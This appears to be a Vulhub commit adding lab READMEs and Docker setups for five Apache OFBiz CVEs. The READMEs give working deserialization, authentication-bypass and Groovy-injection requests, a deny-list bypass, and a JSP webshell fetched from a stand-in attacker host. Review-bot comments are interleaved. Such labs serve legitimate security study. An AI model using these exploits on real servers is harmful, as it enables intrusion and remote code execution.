first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled

This commit is contained in:
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions

BIN
ofbiz/CVE-2020-9496/1.png Normal file

Binary file not shown.

BIN
ofbiz/CVE-2020-9496/2.png Normal file

Binary file not shown.

BIN
ofbiz/CVE-2020-9496/3.png Normal file

Binary file not shown.

View File

@@ -0,0 +1,69 @@
# Unsafe deserialization of XMLRPC arguments in ApacheOfBiz (CVE-2020-9496)
[中文版本(Chinese version)](README.zh-cn.md)
Apache OFBiz is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.
OfBiz exposes an XMLRPC endpoint at `/webtools/control/xmlrpc`. This is an unauthenticated endpoint since authentication is applied on a per-service basis. However, the XMLRPC request is processed before authentication. As part of this processing, any serialized arguments for the remote invocation are deserialized, therefore if the classpath contains any classes that can be used as gadgets to achieve remote code execution, an attacker will be able to run arbitrary system commands on any OfBiz server with same privileges as the servlet container running OfBiz.
References:
1. https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz
2. https://github.com/dwisiswant0/CVE-2020-9496
3. https://www.cnblogs.com/ph4nt0mer/p/13576739.html
## Vulnerable environment
Executing following command to start an Apache OfBiz (17.12.01):
```
docker compose up -d
```
After a short wait, you can see the login page at `https://localhost:8443/accounting`.
## Vulnerability Reproduce
There is no error message in response by default, we can't reproduce the vulnerability using the POC of [reference link 2](https://github.com/dwisiswant0/CVE-2020-9496), so ask [ysoserial](https://github.com/frohoff/ysoserial) for help.
Generate the CommonsBeanutils1 payload:
```
java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"
```
![](1.png)
Replace the `[base64-payload]` and send the request:
```
POST /webtools/control/xmlrpc HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093
<?xml version="1.0"?>
<methodCall>
<methodName>ProjectDiscovery</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
```
![](2.png)
`touch /tmp/success` is succesful executing in the container:
![](3.png)
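Review bot: the closing line `` `touch /tmp/success` is succesful executing in the container: `` has a typo and a grammar slip; suggest `` `touch /tmp/success` was executed successfully inside the container: ``. Elsewhere in this hunk the title runs `ApacheOfBiz` together, the body alternates `OfBiz` and `OFBiz` (the project writes OFBiz), `Executing following command` should be `Execute the following command`, and the numbered `References:` list differs from the bulleted lists in the other READMEs of this commit, which the markdown check may flag. The request's `Content-Length: 4093` only fits one particular base64 blob: say that the client must recompute it for whatever ysoserial emits, otherwise the server reads a truncated or padded body and the XML never parses. It would also help to state the affected version range here (the Chinese README in this directory says before 17.12.04) so that the choice of 17.12.01 for the environment is explained.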

View File

@@ -0,0 +1,67 @@
# Apache OfBiz 反序列化命令执行漏洞CVE-2020-9496
Apache OFBiz是一个非常著名的电子商务平台是一个非常著名的开源项目提供了创建基于最新J2EE/XML规范和技术标准构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。
其17.12.04版本之前的XMLRPC接口存在一处反序列化漏洞攻击者利用这个漏洞可以在目标服务器上执行任意命令。
参考链接:
- https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz
- https://github.com/dwisiswant0/CVE-2020-9496
- https://www.cnblogs.com/ph4nt0mer/p/13576739.html
## 漏洞环境
执行如下命令启动一个Apache OfBiz 17.12.01版本:
```
docker compose up -d
```
在等待数分钟后,访问`https://localhost:8443/accounting`查看到登录页面,说明环境已启动成功。
## 漏洞复现
由于默认情况下没有报错信息,所以使用[参考连接2](https://github.com/dwisiswant0/CVE-2020-9496)中给出的方法无法正确判断漏洞是否存在,还是需要通过执行反序列化来复现漏洞。
使用[ysoserial](https://github.com/frohoff/ysoserial)的CommonsBeanutils1来生成Payload
```
java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"
```
![](1.png)
将base64后的payload替换并发送如下数据包
```
POST /webtools/control/xmlrpc HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093
<?xml version="1.0"?>
<methodCall>
<methodName>ProjectDiscovery</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
```
![](2.png)
进入容器中,可见`touch /tmp/success`已成功执行:
![](3.png)
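Review bot: `参考连接2` in the first paragraph of 漏洞复现 is a typo for `参考链接2` (the heading above uses `参考链接:`). The affected range given here, versions before 17.12.04, disagrees with the CVE-2023-49070 READMEs in the same commit (`prior to 17.12.03` / `17.12.03版本及以前`); settle on one range and use it in all four files. The images `![](1.png)` through `![](3.png)` have empty alt text, which the markdown check will likely flag; a short description (ysoserial output, request and response, shell inside the container) is enough.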

View File

@@ -0,0 +1,6 @@
services:
web:
image: vulhub/ofbiz:17.12.01
ports:
- "8443:8443"
- "5005:5005"
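Review bot: `- "5005:5005"` publishes a second port on every host interface, but neither README in this directory says what listens on it. 5005 is the conventional JDWP remote-debugging port; if that is what the image exposes, document it and bind it to loopback (`- "127.0.0.1:5005:5005"`), because a JDWP listener reachable from the network gives anyone who connects control of the JVM, which is more than the lab intends to expose. If it is not needed to reproduce the issue, drop the mapping. The same applies to the other five docker-compose.yml files in this commit.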

BIN
ofbiz/CVE-2023-49070/1.png Normal file

Binary file not shown.

BIN
ofbiz/CVE-2023-49070/2.png Normal file

Binary file not shown.

BIN
ofbiz/CVE-2023-49070/3.png Normal file

Binary file not shown.

BIN
ofbiz/CVE-2023-49070/4.png Normal file

Binary file not shown.

View File

@@ -0,0 +1,74 @@
# Unsafe deserialization of XMLRPC arguments in Apache OFBiz (CVE-2023-49070)
[中文版本(Chinese version)](README.zh-cn.md)
Apache OFBiz is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.
Apahce OFBiz prior to 17.12.03, there is a deserialization issue caused by XMLRPC endpoint at `/webtools/control/xmlrpc`, which is marked as [CVE-2020-9496](https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2020-9496). Developer fixed this issue by adding authentication check and filter, but the patches have been bypassed by CVE-2023-49070.
Apache OFBiz deleted XMLRPC interface to escape this nightmare at version 18.12.10 eventually.
References:
- <https://www.openwall.com/lists/oss-security/2023/12/04/2>
- <https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2020-9496>
## Vulnerable environment
Executing following command to start an Apache OfBiz 18.12.09 server:
```
docker compose up -d
```
After a short wait, you can see the login page at `https://localhost:8443/accounting`.
## Vulnerability Reproduce
The method to reproduce CVE-2023-49070 is similar to [CVE-2020-9496](https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2020-9496), except that it requires bypassing the patches.
First of all, use [ysoserial](https://github.com/frohoff/ysoserial) to generate a CommonsBeanutils1 gadget payload:
```
java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"
```
![](1.png)
Sending packets using the method in CVE-2020-9496 no longer works:
![](2.png)
But modifing the path to `/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y` is able to bypass the restriction:
```
POST /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093
<?xml version="1.0"?>
<methodCall>
<methodName>ProjectDiscovery</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
```
![](3.png)
`touch /tmp/success` has been executed in the container:
![](4.png)
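Review bot: `Apahce OFBiz prior to 17.12.03, there is a deserialization issue caused by XMLRPC endpoint` misspells Apache and has no subject; suggest `In Apache OFBiz prior to 17.12.03 there is a deserialization issue in the XMLRPC endpoint`. Also `modifing` should be `modifying`, `Executing following command` should be `Execute the following command`, and `Content-Length: 4093` carries the same caveat as in the CVE-2020-9496 README (it depends on the generated payload). The key sentence, `Developer fixed this issue by adding authentication check and filter, but the patches have been bypassed by CVE-2023-49070`, should say what the bypass consists of, since the only evidence given is the path `/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y`; one sentence on why the `;/` path suffix and the empty-credential query string get past the added check would turn the screenshot into an explanation, and would also make clear why the eventual fix was to remove the interface in 18.12.10.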

View File

@@ -0,0 +1,71 @@
# Apache OfBiz 反序列化命令执行漏洞CVE-2023-49070
Apache OFBiz是一个非常著名的电子商务平台是一个非常著名的开源项目提供了创建基于最新J2EE/XML规范和技术标准构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。
在Apache OFBiz 17.12.03版本及以前存在一处XMLRPC导致的反序列漏洞官方于后续的版本中对相关接口进行加固修复漏洞但修复方法存在绕过问题CVE-2023-49070攻击者仍然可以利用反序列化漏洞在目标服务器中执行任意命令。
Apache OFBiz官方于18.12.10中彻底删除xmlrpc接口修复该漏洞。
参考链接:
- <https://www.openwall.com/lists/oss-security/2023/12/04/2>
## 漏洞环境
执行如下命令启动一个Apache OfBiz 18.12.09服务器:
```
docker compose up -d
```
在等待数分钟后,访问`https://localhost:8443/accounting`查看到登录页面,说明环境已启动成功。
## 漏洞复现
漏洞复现方式与[CVE-2020-9496](https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2020-9496)相似,只是需要绕过官方对于漏洞的补丁限制。
首先,仍然使用[ysoserial](https://github.com/frohoff/ysoserial)的CommonsBeanutils1来生成Payload
```
java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"
```
![](1.png)
使用CVE-2020-9496中的复现方法发送数据包可见已经无法成功进入XMLRPC的解析流程
![](2.png)
把Path修改成`/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y`即可绕过限制:
```
POST /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093
<?xml version="1.0"?>
<methodCall>
<methodName>ProjectDiscovery</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>test</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
```
![](3.png)
进入容器中,可见`touch /tmp/success`已成功执行:
![](4.png)
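Review bot: `17.12.03版本及以前` (17.12.03 and earlier) contradicts `prior to 17.12.03` in the English README of this directory; one boundary is wrong and both files should state the same range. The Chinese reference list also omits the vulhub CVE-2020-9496 link that the English list includes, although the 漏洞复现 paragraph links to it inline; keep the two lists identical.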

View File

@@ -0,0 +1,6 @@
services:
web:
image: vulhub/ofbiz:18.12.09
ports:
- "8443:8443"
- "5005:5005"

BIN
ofbiz/CVE-2023-51467/1.png Normal file

Binary file not shown.

View File

@@ -0,0 +1,44 @@
# Apache OFBiz Authentication Bypass Leads to RCE (CVE-2023-51467)
[中文版本(Chinese version)](README.zh-cn.md)
Apache OFBiz is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.
This vulnerability occurs as a result of incomplete fixing for [CVE-2023-49070](https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2023-49070). In Apache OFBiz version 18.12.10, the developers removed the XMLRPC to fix the previous RCE issue, but the authentication bypass still exists. The researcher from Chaitin Tech found another attack approach to perform the pre-auth RCE using Groovy expression injection.
References:
- <https://github.com/apache/ofbiz-framework/commit/d8b097f6717a4004acf023dfe929e0e41ad63faa>
- <https://xz.aliyun.com/t/13211>
- <https://y4tacker.github.io/2023/12/27/year/2023/12/Apache-OFBiz%E6%9C%AA%E6%8E%88%E6%9D%83%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%B5%85%E6%9E%90-CVE-2023-51467/>
## Vulnerable environment
Executing following command to start an Apache OfBiz 18.12.10 server:
```
docker compose up -d
```
After a short wait, you can see the login page at `https://localhost:8443/accounting`.
## Vulnerability Reproduce
Send following request to execute command `id` by Groovy script:
```
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
groovyProgram=throw+new+Exception('id'.execute().text);
```
![](1.png)
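Review bot: the request in this hunk is padded with browser headers (`Accept-Language`, `User-Agent`, `Cache-Control`) that play no part in the issue; trimming it to the request line, `Host`, `Content-Type` and `Content-Length` would make the two things that matter stand out: the query string `USERNAME=&PASSWORD=&requirePasswordChange=Y` on an endpoint that should require a session, and the `groovyProgram` parameter that is evaluated server-side. (`Content-Length: 55` does match the body shown, unlike some other READMEs in this commit.) Also `Host: localhost:8443` here while the 2020-9496 and 2023-49070 READMEs use `Host: your-ip`; `Executing following command` should read `Execute the following command`; and `The researcher from Chaitin Tech found another attack approach` reads better as `Researchers at Chaitin Tech found another route`.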

View File

@@ -0,0 +1,42 @@
# Apache OFBiz 鉴权绕过导致命令执行CVE-2023-51467
Apache OFBiz是一个非常著名的电子商务平台是一个非常著名的开源项目提供了创建基于最新J2EE/XML规范和技术标准构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。
这个漏洞的原因是对于[CVE-2023-49070](https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2023-49070)的不完全修复。在Apache OFBiz 18.12.10版本中官方移除了可能导致RCE漏洞的XMLRPC组件但没有修复权限绕过问题。来自长亭科技的安全研究员利用这一点找到了另一个可以导致RCE的方法Groovy表达式注入。
参考连接:
- <https://github.com/apache/ofbiz-framework/commit/d8b097f6717a4004acf023dfe929e0e41ad63faa>
- <https://xz.aliyun.com/t/13211>
- <https://y4tacker.github.io/2023/12/27/year/2023/12/Apache-OFBiz%E6%9C%AA%E6%8E%88%E6%9D%83%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%B5%85%E6%9E%90-CVE-2023-51467/>
## 漏洞环境
执行如下命令启动一个Apache OfBiz 18.12.10服务器:
```
docker compose up -d
```
在等待数分钟后,访问`https://localhost:8443/accounting`查看到登录页面,说明环境已启动成功。
## 漏洞复现
直接发送如下请求即可使用Groovy脚本执行`id`命令:
```
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
groovyProgram=throw+new+Exception('id'.execute().text);
```
![](1.png)
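Review bot: `参考连接:` is a typo for `参考链接:` as used in the other Chinese READMEs of this commit. As in the English file, the request would be clearer trimmed to the request line, `Host`, `Content-Type` and `Content-Length`, so that the `requirePasswordChange=Y` query string and the `groovyProgram` parameter are the only things left to notice.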

View File

@@ -0,0 +1,6 @@
services:
web:
image: vulhub/ofbiz:18.12.10
ports:
- "8443:8443"
- "5005:5005"

BIN
ofbiz/CVE-2024-38856/1.png Normal file

Binary file not shown.

View File

@@ -0,0 +1,59 @@
# Apache OFBiz Authentication Bypass Leads to RCE (CVE-2024-38856)
[中文版本(Chinese version)](README.zh-cn.md)
Apache OFBiz is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.
This vulnerability occurs as a result of incomplete fixing for [CVE-2023-51467](https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2023-51467). In Apache OFBiz version 18.12.11, the developers believe they have fixed the vulnerability, but in reality, they have only addressed one method of exploiting it. The Groovy expression injection still exists and allows unauthorized users to execute arbitrary commands on the server.
References:
- <https://github.com/apache/ofbiz-framework/commit/31d8d7>
- <https://forum.butian.net/article/524>
- <https://github.com/Praison001/CVE-2024-38856-ApacheOfBiz>
## Vulnerable environment
Executing following command to start an Apache OfBiz 18.12.14 server:
```
docker compose up
```
After a short wait, you can see the login page at `https://localhost:8443/accounting`.
## Vulnerability Reproduce
Send following request to execute command `id` by Groovy script:
```
POST /webtools/control/main/ProgramExport HTTP/1.1
Host: localhost:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDbR7sY3IIwQX7kcJ
Content-Length: 190
------WebKitFormBoundaryDbR7sY3IIwQX7kcJ
Content-Disposition: form-data; name="groovyProgram"
throw new Exception('id'.\u0065xecute().text);
------WebKitFormBoundaryDbR7sY3IIwQX7kcJ--
```
![](1.png)
Noted that Apache Ofbiz restricts the use of the following keywords, but we can bypass this restriction using Unicode characters like `\u0065xecute`.
```
deniedWebShellTokens=java.,beans,freemarker,<script,javascript,<body,body ,<form,<jsp:,<c:out,taglib,<prefix,<%@ page,<?php,exec(,alert(,\
%eval,@eval,eval(,runtime,import,passthru,shell_exec,assert,str_rot13,system,decode,include,page ,\
chmod,mkdir,fopen,fclose,new file,upload,getfilename,download,getoutputstring,readfile,iframe,object,embed,onload,build,\
python,perl ,/perl,ruby ,/ruby,process,function,class,InputStream,to_server,wget ,static,assign,webappPath,\
ifconfig,route,crontab,netstat,uname ,hostname,iptables,whoami,"cmd",*cmd|,+cmd|,=cmd|,localhost,thread,require,gzdeflate,\
execute,println,calc,touch,calculate
```
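Review bot: `docker compose up` in the Vulnerable environment section is the only one in this commit without `-d`, and the Chinese README for the same CVE has `-d`; make them consistent. `Noted that Apache Ofbiz restricts the use of the following keywords` should read `Note that Apache OFBiz restricts the following keywords`, and the `deniedWebShellTokens` block has no stated origin; name the configuration file and the OFBiz version it was copied from, since the list changes between releases. The explanation of the bypass can be made explicit from what the hunk already shows: the list contains `execute`, yet `'id'.\u0065xecute()` runs, so the check is matching the raw parameter text while the Groovy compiler decodes `\u0065` to `e` before the code is tokenized; stating that gives the reader the defensive conclusion, namely that a deny-list over source text is not a security boundary and the real fix is authentication on `ProgramExport`. Finally, the commit reference `31d8d7` is a six-character hash where the other READMEs use ten or more; lengthen it to avoid ambiguity.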

View File

@@ -0,0 +1,57 @@
# Apache OFBiz 身份验证绕过导致远程代码执行 (CVE-2024-38856)
Apache OFBiz 是一个开源的企业资源规划ERP系统。它提供了一套企业应用程序用于集成和自动化企业的许多业务流程。
这个漏洞是由于对 [CVE-2023-51467](https://github.com/vulhub/vulhub/tree/master/ofbiz/CVE-2023-51467) 的不完全修复而产生的。在 Apache OFBiz 18.12.11 版本中开发人员认为他们已经修复了该漏洞但实际上他们只解决了其中一种利用方法。Groovy 表达式注入仍然存在,允许未经授权的用户在服务器上执行任意命令。
References:
- <https://github.com/apache/ofbiz-framework/commit/31d8d7>
- <https://forum.butian.net/article/524>
- <https://github.com/Praison001/CVE-2024-38856-ApacheOfBiz>
## 漏洞环境
执行如下命令启动一个Apache OfBiz 18.12.10服务器:
```
docker compose up -d
```
在等待数分钟后,访问`https://localhost:8443/accounting`查看到登录页面,说明环境已启动成功。
## 漏洞复现
直接发送如下请求即可使用Groovy脚本执行`id`命令:
```
POST /webtools/control/main/ProgramExport HTTP/1.1
Host: localhost:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDbR7sY3IIwQX7kcJ
Content-Length: 190
------WebKitFormBoundaryDbR7sY3IIwQX7kcJ
Content-Disposition: form-data; name="groovyProgram"
throw new Exception('id'.\u0065xecute().text);
------WebKitFormBoundaryDbR7sY3IIwQX7kcJ--
```
![](1.png)
值得注意的是Apache Ofbiz限制了如下一些关键词的使用我们可以通过Unicode编码来绕过这个限制比如`\u0065xecute`
```
deniedWebShellTokens=java.,beans,freemarker,<script,javascript,<body,body ,<form,<jsp:,<c:out,taglib,<prefix,<%@ page,<?php,exec(,alert(,\
%eval,@eval,eval(,runtime,import,passthru,shell_exec,assert,str_rot13,system,decode,include,page ,\
chmod,mkdir,fopen,fclose,new file,upload,getfilename,download,getoutputstring,readfile,iframe,object,embed,onload,build,\
python,perl ,/perl,ruby ,/ruby,process,function,class,InputStream,to_server,wget ,static,assign,webappPath,\
ifconfig,route,crontab,netstat,uname ,hostname,iptables,whoami,"cmd",*cmd|,+cmd|,=cmd|,localhost,thread,require,gzdeflate,\
execute,println,calc,touch,calculate
```
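Review bot: the environment section says `Apache OfBiz 18.12.10`, but the docker-compose.yml in this directory pulls `vulhub/ofbiz:18.12.14` and the English README says 18.12.14; fix the version. The `References:` heading is left in English where the other Chinese READMEs use `参考链接:`, and `Apache Ofbiz` in the last paragraph should be `Apache OFBiz`. The `deniedWebShellTokens` block should also say which configuration file and OFBiz version it was copied from.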

View File

@@ -0,0 +1,6 @@
services:
web:
image: vulhub/ofbiz:18.12.14
ports:
- "8443:8443"
- "5005:5005"

BIN
ofbiz/CVE-2024-45195/1.png Normal file

Binary file not shown.

BIN
ofbiz/CVE-2024-45195/2.png Normal file

Binary file not shown.

View File

@@ -0,0 +1,66 @@
# Apache OFBiz Authentication Bypass Leads to RCE (CVE-2024-45195)
[中文版本(Chinese version)](README.zh-cn.md)
Apache OFBiz is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.
This vulnerability occurs as a result of incomplete fixing for previous vulnerabilities (CVE-2024-32113, CVE-2024-36104, and CVE-2024-38856). In Apache OFBiz versions prior to 18.12.16, the developers implemented fixes for these previous issues, but the underlying problem of controller-view map state desynchronization still existed. This allowed attackers to bypass authentication and access sensitive admin-only view maps.
References:
- <https://github.com/apache/ofbiz-framework/commit/ab78769c2d>
- <https://github.com/apache/ofbiz-plugins/commit/8b95fe6fa>
- <https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed/>
## Vulnerable environment
Executing following command to start an Apache OfBiz 18.12.15 server:
```
docker compose up -d
```
After a short wait, you can see the login page at `https://localhost:8443/accounting`.
## Vulnerability Reproduce
Before reproducing the vulnerability, this exploit requires setting up a malicious XML schema file and a CSV file on an attacker-controlled server
First one `rceschema.xml`, this XML schema defines the structure of the malicious JSP:
```xml
<data-files xsi:noNamespaceSchemaLocation="http://ofbiz.apache.org/dtds/datafiles.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<data-file name="rce" separator-style="fixed-length" type-code="text" start-line="0" encoding-type="UTF-8">
<record name="rceentry" limit="many">
<field name="jsp" type="String" length="605" position="0"></field>
</record>
</data-file>
</data-files>
```
Second one `rcereport.csv`, this CSV file contains the actual JSP code:
```jsp
<%@ page import='java.io.*' %><%@ page import='java.util.*' %><h1>Ahoy!</h1><br><% String getcmd = request.getParameter("cmd"); if (getcmd != null) { out.println("Command: " + getcmd + "<br>"); String cmd1 = "/bin/sh"; String cmd2 = "-c"; String cmd3 = getcmd; String[] cmd = new String[3]; cmd[0] = cmd1; cmd[1] = cmd2; cmd[2] = cmd3; Process p = Runtime.getRuntime().exec(cmd); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine();}} %>,
```
Then send the following request:
```
POST /webtools/control/forgotPassword/viewdatafile HTTP/1.1
Host: target:8443
User-Agent: curl/7.81.0
Accept: */*
Content-Length: 241
Content-Type: application/x-www-form-urlencoded
DATAFILE_LOCATION=http://attacker/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://attacker/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce
```
![](1.png)
This request exploits the vulnerability by leveraging the viewdatafile view map to write a malicious JSP file to the web root, effectively achieving remote code execution.
After the JSP webshell is written, execute arbitrary commands through `https://localhost:8443/accounting/index.jsp?cmd=id`:
![](2.png)
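Review bot: `Content-Length: 241` does not match the body shown, which is 229 bytes; since `http://attacker/...` is a placeholder the reader will replace anyway, either drop the header or say that it must be recomputed for the final URLs. The first paragraph under Vulnerability Reproduce is missing its full stop and reads awkwardly; suggest `This exploit needs two files hosted on a server the attacker controls: an XML schema and a CSV file.` Use a reserved name such as `attacker.example` rather than a bare `attacker` hostname so that copy-and-paste does not resolve somewhere unexpected. Two details the reader otherwise discovers by trial should be stated: the schema's `length="605"` fixed-length field is tied to the length of the JSP line in the CSV, so a modified webshell needs an updated value, and `DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp` overwrites the application's existing index page, which is also the artifact (a changed `index.jsp` under the web root) a defender would look for when checking whether this was exploited.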

View File

@@ -0,0 +1,64 @@
# Apache OFBiz 身份验证绕过导致远程代码执行CVE-2024-45195
Apache OFBiz是一个开源企业资源规划ERP系统。它提供了一套企业应用程序集成并自动化企业的许多业务流程。
该漏洞是由于之前漏洞CVE-2024-32113、CVE-2024-36104和CVE-2024-38856未完全修复所导致。在Apache OFBiz版本18.12.16之前,开发人员对这些先前的问题进行了修复,但控制器视图地图状态不同步的根本问题仍然存在。这使得攻击者能够绕过身份验证并访问敏感的仅限管理员的视图地图。
参考链接:
- <https://github.com/apache/ofbiz-framework/commit/ab78769c2d>
- <https://github.com/apache/ofbiz-plugins/commit/8b95fe6fa>
- <https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed/>
## 漏洞环境
执行以下命令启动一个 Apache OfBiz 18.12.15服务器:
```
docker compose up -d
```
在等待数分钟后,访问`https://localhost:8443/accounting`查看到登录页面,说明环境已启动成功。
## 漏洞复现
在复现此漏洞之前我们需要在自己控制的服务器上部署恶意XML文件和CSV文件。
第一个文件是`rceschema.xml`此XML schema文件定义了恶意 JSP 的结构:
```xml
<data-files xsi:noNamespaceSchemaLocation="http://ofbiz.apache.org/dtds/datafiles.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<data-file name="rce" separator-style="fixed-length" type-code="text" start-line="0" encoding-type="UTF-8">
<record name="rceentry" limit="many">
<field name="jsp" type="String" length="605" position="0"></field>
</record>
</data-file>
</data-files>
```
第二个文件是`rcereport.csv`此CSV文件包含实际的JSP代码
```jsp
<%@ page import='java.io.*' %><%@ page import='java.util.*' %><h1>Ahoy!</h1><br><% String getcmd = request.getParameter("cmd"); if (getcmd != null) { out.println("Command: " + getcmd + "<br>"); String cmd1 = "/bin/sh"; String cmd2 = "-c"; String cmd3 = getcmd; String[] cmd = new String[3]; cmd[0] = cmd1; cmd[1] = cmd2; cmd[2] = cmd3; Process p = Runtime.getRuntime().exec(cmd); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine();}} %>,
```
然后发送以下请求:
```
POST /webtools/control/forgotPassword/viewdatafile HTTP/1.1
Host: target:8443
User-Agent: curl/7.81.0
Accept: */*
Content-Length: 241
Content-Type: application/x-www-form-urlencoded
DATAFILE_LOCATION=http://attacker/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://attacker/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce
```
![](1.png)
该请求通过利用viewdatafile视图地图将恶意JSP文件写入Web根目录从而利用了该漏洞实现远程代码执行。
在JSP webshell被写入后通过`https://localhost:8443/accounting/index.jsp?cmd=id`即可执行任意命令:
![](2.png)
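Review bot: `控制器视图地图` and `视图地图` render OFBiz's view-map literally as a geographic map; `视图映射` is the usual term and reads correctly in `仅限管理员的视图映射`. The request has the same `Content-Length: 241` mismatch as the English file (the body shown is 229 bytes), and the bare `attacker` hostname would be clearer as a reserved name such as `attacker.example`.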

View File

@@ -0,0 +1,6 @@
services:
web:
image: vulhub/ofbiz:18.12.15
ports:
- "8443:8443"
- "5005:5005"

